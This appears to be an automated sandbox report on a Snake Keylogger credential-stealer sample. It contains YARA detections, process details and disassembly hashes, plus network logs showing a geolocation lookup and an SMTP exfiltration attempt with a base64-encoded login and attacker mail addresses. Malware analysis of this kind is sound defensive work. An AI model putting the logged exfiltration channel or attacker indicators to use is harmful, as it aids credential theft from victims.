                          2024-10-23 14:01:46 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-10-23 14:01:46 UTC894INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:46 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28042
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t1JUhZtJPs9zXR5bxQ5jB7unjEeuW%2F%2FqvNjC75De9E6WJ06BLRe89eVcLphsmHK54Yry5VpC9ZW%2F3qpfzpQD4yMbu9fHL1fpWrtf3Wu5b8qi8xvzMEv6vTcaRTPQZxNFtJcKuyU9"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d7242d02c556be0-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1725&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1765853&cwnd=251&unsent_bytes=0&cid=8ad2526f9201181c&ts=156&x=0"
                          2024-10-23 14:01:46 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:46 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          SMTP Packets

                          TimestampSource PortDest PortSource IPDest IPCommands
                          Oct 23, 2024 16:01:52.697479010 CEST58749741185.14.58.143192.168.2.5220 cloud.salitel.com ESMTP Exim 4.94.2 Wed, 23 Oct 2024 16:01:52 +0200
                          Oct 23, 2024 16:01:52.698625088 CEST49741587192.168.2.5185.14.58.143EHLO 928100
                          Oct 23, 2024 16:01:52.950872898 CEST58749741185.14.58.143192.168.2.5250-cloud.salitel.com Hello 928100 [173.254.250.90]
                          250-SIZE 52428800
                          250-8BITMIME
                          250-PIPELINING
                          250-PIPE_CONNECT
                          250-AUTH PLAIN LOGIN
                          250-STARTTLS
                          250 HELP
                          Oct 23, 2024 16:01:52.953181982 CEST49741587192.168.2.5185.14.58.143AUTH login bW9udGVzaW5vc0BhenZjb25zdWx0aW5nLmNvbQ==
                          Oct 23, 2024 16:01:53.204345942 CEST58749741185.14.58.143192.168.2.5334 UGFzc3dvcmQ6
                          Oct 23, 2024 16:01:53.485181093 CEST58749741185.14.58.143192.168.2.5535 Incorrect authentication data
                          Oct 23, 2024 16:01:53.486671925 CEST49741587192.168.2.5185.14.58.143MAIL FROM:<montesinos@azvconsulting.com>
                          Oct 23, 2024 16:01:53.738452911 CEST58749741185.14.58.143192.168.2.5250 OK
                          Oct 23, 2024 16:01:53.738666058 CEST49741587192.168.2.5185.14.58.143RCPT TO:<peacefulrobber@gmail.com>
                          Oct 23, 2024 16:01:53.991113901 CEST58749741185.14.58.143192.168.2.5550 relay not permitted, authentication required

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:10:01:30
                          Start date:23/10/2024
                          Path:C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe"
                          Imagebase:0xa10000
                          File size:655'872 bytes
                          MD5 hash:43299ECABD7A0636E5755414D6B7DC0C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:3
                          Start time:10:01:32
                          Start date:23/10/2024
                          Path:C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Imagebase:0x960000
                          File size:655'872 bytes
                          MD5 hash:43299ECABD7A0636E5755414D6B7DC0C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4498824475.0000000003DAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4498824475.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4498824475.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:false

                          Disassembly

                          Reset < >

                            Executed Functions

                            Function 00007FF848F416B8 Relevance: 2.6, Strings: 1, Instructions: 1371COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: (OH
                            • API String ID: 0-3924564084
                            • Opcode ID: 87fe3a68bdd9fcf994557c31716274fc4ce35d3ea012f46e876bd0db438e5122
                            • Instruction ID: ff4a48664c893d245ed89293256b8f54a87b66cd025ff21a635838c00723b58c
                            • Opcode Fuzzy Hash: 87fe3a68bdd9fcf994557c31716274fc4ce35d3ea012f46e876bd0db438e5122
                            • Instruction Fuzzy Hash: 80B2A634609A1D8FDBD8EF18C494BA973A2FF69304F5045B9E40DD7296CB36AD92CB00
                            Function 00007FF848F47D9A Relevance: 1.9, Strings: 1, Instructions: 639COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: [
                            • API String ID: 0-784033777
                            • Opcode ID: c83f82c14ebfc09a97193852f810c2f16062abc00622513f87bbf191473218f6
                            • Instruction ID: 0a87b3a5ad6017ef8cdcf3a151aaafb13302c5d3e47275a9014507491885a495
                            • Opcode Fuzzy Hash: c83f82c14ebfc09a97193852f810c2f16062abc00622513f87bbf191473218f6
                            • Instruction Fuzzy Hash: 4F42E83091992D8FDBA4EB58C894BA9B7B1FF68341F5041FAD00DE7295CB34A981CF40
                            Function 00007FF848F4EED7 Relevance: .3, Instructions: 289COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 91daf4f3899c9bb19e7c1bfd6430cc6e5ed0dcb4640c132ba870d39659e37549
                            • Instruction ID: d5980705c833d37b1ccbfc075a67e7f57522238fabc7ce54a080ed7724d95c26
                            • Opcode Fuzzy Hash: 91daf4f3899c9bb19e7c1bfd6430cc6e5ed0dcb4640c132ba870d39659e37549
                            • Instruction Fuzzy Hash: A6C1FA30A1861A8FDBA8DF54C490BB9B7B2FF58314F5041BDC41EA7685DB34A985CF04
                            Function 00007FF848F40790 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: <L_^$_
                            • API String ID: 0-2684969648
                            • Opcode ID: 10cbdcddc44de35873ed9cf1f49676ad38ed25b305116a64f354d64066e1def6
                            • Instruction ID: a48d6f271e16e9a43736574cf25abcf442bc24c781ae7888b6a1507e19894a62
                            • Opcode Fuzzy Hash: 10cbdcddc44de35873ed9cf1f49676ad38ed25b305116a64f354d64066e1def6
                            • Instruction Fuzzy Hash: 3E412472D0D6C69FF385BB7858A91B97B90FFB1B84F1800BBC4449B0D3DA18A805C756
                            Function 00007FF848F49192 Relevance: 2.1, Strings: 1, Instructions: 823COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: {z}
                            • API String ID: 0-1552007774
                            • Opcode ID: f8777eb1171046a2037c25117b2d00001b11640987648c86fb31ecb9b26b953c
                            • Instruction ID: 6ddc17dfbd94bc53ab253bd8e91728eae85993dd1205646c58eeb180b9d02bbb
                            • Opcode Fuzzy Hash: f8777eb1171046a2037c25117b2d00001b11640987648c86fb31ecb9b26b953c
                            • Instruction Fuzzy Hash: 3F621E30619A8D8FEBB9EF18C898BE937E1FF69750F50016AC80DDB691DB346945CB40
                            Function 00007FF848F470F4 Relevance: 1.6, Strings: 1, Instructions: 366COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: ~
                            • API String ID: 0-1707062198
                            • Opcode ID: 32dcf9819d0eccb7885898f28833537682aad254a48e6065b8477dddb329605b
                            • Instruction ID: 0ee0c5770c4feeec1f90efcc72a7704395df155c1319e040804d6c47730a93ee
                            • Opcode Fuzzy Hash: 32dcf9819d0eccb7885898f28833537682aad254a48e6065b8477dddb329605b
                            • Instruction Fuzzy Hash: 3BD1DE74A1991DCFEB94EB58C894BA9B3B1FFA9301F5041A9D00DE7295DB38AD81CF40
                            Function 00007FF848F4591A Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: o+
                            • API String ID: 0-251698391
                            • Opcode ID: 9a0e6c7f3e39d61a7c0405bd035d7fe29568344870636a3583bf735acea99a50
                            • Instruction ID: d54f96ce94898757c695565bee4d63695860cb7acbe9d9d0fe67e04bcb80e06c
                            • Opcode Fuzzy Hash: 9a0e6c7f3e39d61a7c0405bd035d7fe29568344870636a3583bf735acea99a50
                            • Instruction Fuzzy Hash: 28119970D0C91D9FEB98EF44D494BA8B7B1EB69B50F5001AAD04EE2291CF386984CF05
                            Function 00007FF848F4D2B2 Relevance: .7, Instructions: 747COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1970d0ce52aaee7787aedcb24d78bcc2cc504fd1d10d59037d9c0ce597dd7e8a
                            • Instruction ID: ed75492032feff405bbe0384bfca2f8c3d7b3c57a63f552b5c2fe088f4a73c4f
                            • Opcode Fuzzy Hash: 1970d0ce52aaee7787aedcb24d78bcc2cc504fd1d10d59037d9c0ce597dd7e8a
                            • Instruction Fuzzy Hash: 32426D3462498E9FE769EF08C494BE473A1FB6C304F6444BCC90ECB795CA75A982CB10
                            Function 00007FF848F41FF2 Relevance: .6, Instructions: 614COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 725b11fa926df42040f581415180c0ec7523dbef21953bfefa778a082e220dbd
                            • Instruction ID: d926035f84273ea04d0d33950e4434f2f5adfc9abad8c3302120696eac933489
                            • Opcode Fuzzy Hash: 725b11fa926df42040f581415180c0ec7523dbef21953bfefa778a082e220dbd
                            • Instruction Fuzzy Hash: 0732A730609A1D8FDBD8EF18C498FA973A2FB69304F5045A9D40DDB6A5CB76AD91CF00
                            Function 00007FF848F459EC Relevance: .6, Instructions: 558COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4e57b200779169759f8c8b9467ec719a65b96fea6bf26b806a5a30569aa23f32
                            • Instruction ID: ec6cb065761a08c5b9e38770203433b8c14a1b7b9245ae702830ddd85c7b4784
                            • Opcode Fuzzy Hash: 4e57b200779169759f8c8b9467ec719a65b96fea6bf26b806a5a30569aa23f32
                            • Instruction Fuzzy Hash: A722C77090895D9FDFA9EB18C899BA8B7B1FB69700F1401EAD00DE3291CB35AD81CF45
                            Function 00007FF848F4C57A Relevance: .5, Instructions: 488COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 332ba29c7897a1b7b0edf5518407c7a36eb353bd8d2c006c33d747e3c18b6234
                            • Instruction ID: 519105aea08eec4a1b78876c8fa18ccd12afd72380761203d5e2c2392df1e5da
                            • Opcode Fuzzy Hash: 332ba29c7897a1b7b0edf5518407c7a36eb353bd8d2c006c33d747e3c18b6234
                            • Instruction Fuzzy Hash: 7222DB74A1961D8FDB59DB14C890BEAB7B2FF58304F1052E9C40DE7286DB35A982CF44
                            Function 00007FF848F45C5F Relevance: .3, Instructions: 340COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c5444801694c39836a97f6a0bd0fa398822801a39fc10525ae5e319d6c0e1bf6
                            • Instruction ID: 8b9763401d821c4f277cf03395f6da9f64258860efc67924ecbd7afd00173d4c
                            • Opcode Fuzzy Hash: c5444801694c39836a97f6a0bd0fa398822801a39fc10525ae5e319d6c0e1bf6
                            • Instruction Fuzzy Hash: D8D1957190995D9FDFA9EB18C899BA9B7B1FB68700F1041EAD00DE7291CF35A980CF41
                            Function 00007FF848F46092 Relevance: .3, Instructions: 277COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ba4360f8e2a43e1fbf3091ee550ecfd410c0362e9f999e08fea99badbda01fc8
                            • Instruction ID: 804e14ccb0c4f8e34aba7d73ae1b63606ef9dca4f6130e3056e6a2b26490ea68
                            • Opcode Fuzzy Hash: ba4360f8e2a43e1fbf3091ee550ecfd410c0362e9f999e08fea99badbda01fc8
                            • Instruction Fuzzy Hash: 25A1B87091995D9FDB99EB18C899BA8B7B1FB68740F5001EAD00DE3292DF35AD80CF41
                            Function 00007FF848F472E9 Relevance: .2, Instructions: 220COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e1537610e8422b48ccbf95e1d84aadf625e585822096969df6c707bae176a9e2
                            • Instruction ID: 9dc3a3dc6a2015802b93962f186a38d82ca242422008fe72023c449571cf612d
                            • Opcode Fuzzy Hash: e1537610e8422b48ccbf95e1d84aadf625e585822096969df6c707bae176a9e2
                            • Instruction Fuzzy Hash: 2A717D30D0DA5E8FDB95EBA89850AF97BB1FF65750F1440BAD00DE7292DB38A841CB44
                            Function 00007FF848F4731D Relevance: .2, Instructions: 204COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 535635fbe4d86be94ae3ed861366cc163ef3d969fa1b7df1298774e832d2f336
                            • Instruction ID: 5f7bbe2bb7ac105628bb6d548d0a7b03fb786f565e24e7a37e8ff6dca848b862
                            • Opcode Fuzzy Hash: 535635fbe4d86be94ae3ed861366cc163ef3d969fa1b7df1298774e832d2f336
                            • Instruction Fuzzy Hash: D6618C3190DA9E8FDB96EBA89854AF87FB1EF69710F1440BAD04DE7192DB285841C704
                            Function 00007FF848F4FBCC Relevance: .2, Instructions: 161COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e3968fbadc9bb98045165153ca7c4f102a1d7879f8b7b52cbb5f2db2372a0b54
                            • Instruction ID: 7f95b6a643dfb7c03df751d23d0f38c5491b78f2a9d4ac636e0380dca00df63a
                            • Opcode Fuzzy Hash: e3968fbadc9bb98045165153ca7c4f102a1d7879f8b7b52cbb5f2db2372a0b54
                            • Instruction Fuzzy Hash: 5A512734A2465D8FDB58EF08C881BA8B3B1FF59314F5481E9C44EE3285CA34B982CF85
                            Function 00007FF848F4A121 Relevance: .2, Instructions: 158COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 949f914ec4fb36b097b11fb6d29833b85faa24f20520116ce3d248ab3e6bef24
                            • Instruction ID: d6af9f0c0ed3d0b9d25691ca23923577a1de939c38d04d8d365f1f952fc03890
                            • Opcode Fuzzy Hash: 949f914ec4fb36b097b11fb6d29833b85faa24f20520116ce3d248ab3e6bef24
                            • Instruction Fuzzy Hash: D351647091D91D8FDF98EB58C494BADB7B1FB68741F5001AAD00EE7290DB34A980DF04
                            Function 00007FF848F4EEAF Relevance: .1, Instructions: 137COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 22f2e5dc68fda78b08baf5ebce869ebbd24175c7b379187edf36ef16b7dc0c00
                            • Instruction ID: 50fab97fa1e7fd8ab1c107c0f52d4228d5cf3c2894abee9aba5a9fb10c58df1f
                            • Opcode Fuzzy Hash: 22f2e5dc68fda78b08baf5ebce869ebbd24175c7b379187edf36ef16b7dc0c00
                            • Instruction Fuzzy Hash: A351EA3491851A8FDBA8DB54C890BFDB7B2FF58344F5080A9C41EA7685DB34A985CF04
                            Function 00007FF848F48AE4 Relevance: .1, Instructions: 134COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 203f3bfbcbb17e589e6d82d9fe144d60fd32559e915e499355940d9be29698eb
                            • Instruction ID: 0e2a94c62ab3ee5a8db582e928249f5e4c051c10301894478a7613550104c266
                            • Opcode Fuzzy Hash: 203f3bfbcbb17e589e6d82d9fe144d60fd32559e915e499355940d9be29698eb
                            • Instruction Fuzzy Hash: 8551C974A19A2D8FDF98EF18C890BA9B7B1FF69305F5041AAD00DE3291CB759981CF40
                            Function 00007FF848F48B40 Relevance: .1, Instructions: 134COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cf37323069bb38989d65023c98c0e38d4875e76e6e0dcfc026d6085e035c1650
                            • Instruction ID: 664f8433e7afe434e0433d2401728119990d1b2ca465d9355d4ab19a89940a59
                            • Opcode Fuzzy Hash: cf37323069bb38989d65023c98c0e38d4875e76e6e0dcfc026d6085e035c1650
                            • Instruction Fuzzy Hash: 7651C574919A2D8FDF98EF18D890BA9B3B2FF69704F5005A9D00DE3281CB35A981CF40
                            Function 00007FF848F48B24 Relevance: .1, Instructions: 127COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c4b0dd120b78eacee0de4b879ce17f972cb04005f63c31a7f1cd8669a3b73e83
                            • Instruction ID: 9372f1eb6451da44d1ff06c9ce15960a8d07739364d209f1592906251f4a7b26
                            • Opcode Fuzzy Hash: c4b0dd120b78eacee0de4b879ce17f972cb04005f63c31a7f1cd8669a3b73e83
                            • Instruction Fuzzy Hash: 1241E674919A6D8FDF98EF18C890BA9B7B1FF69704F5005AAD00DE3291CB35A981CF40
                            Function 00007FF848F48AFB Relevance: .1, Instructions: 123COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dbfe41ff495d878cc58a1e6d581dcd1840cb3d55e12e601a6fabd626c33b5e94
                            • Instruction ID: c49e565334d1cdcb41757cdd1b5cf30cc614032dab1e4dfaf8ed183198cbd3be
                            • Opcode Fuzzy Hash: dbfe41ff495d878cc58a1e6d581dcd1840cb3d55e12e601a6fabd626c33b5e94
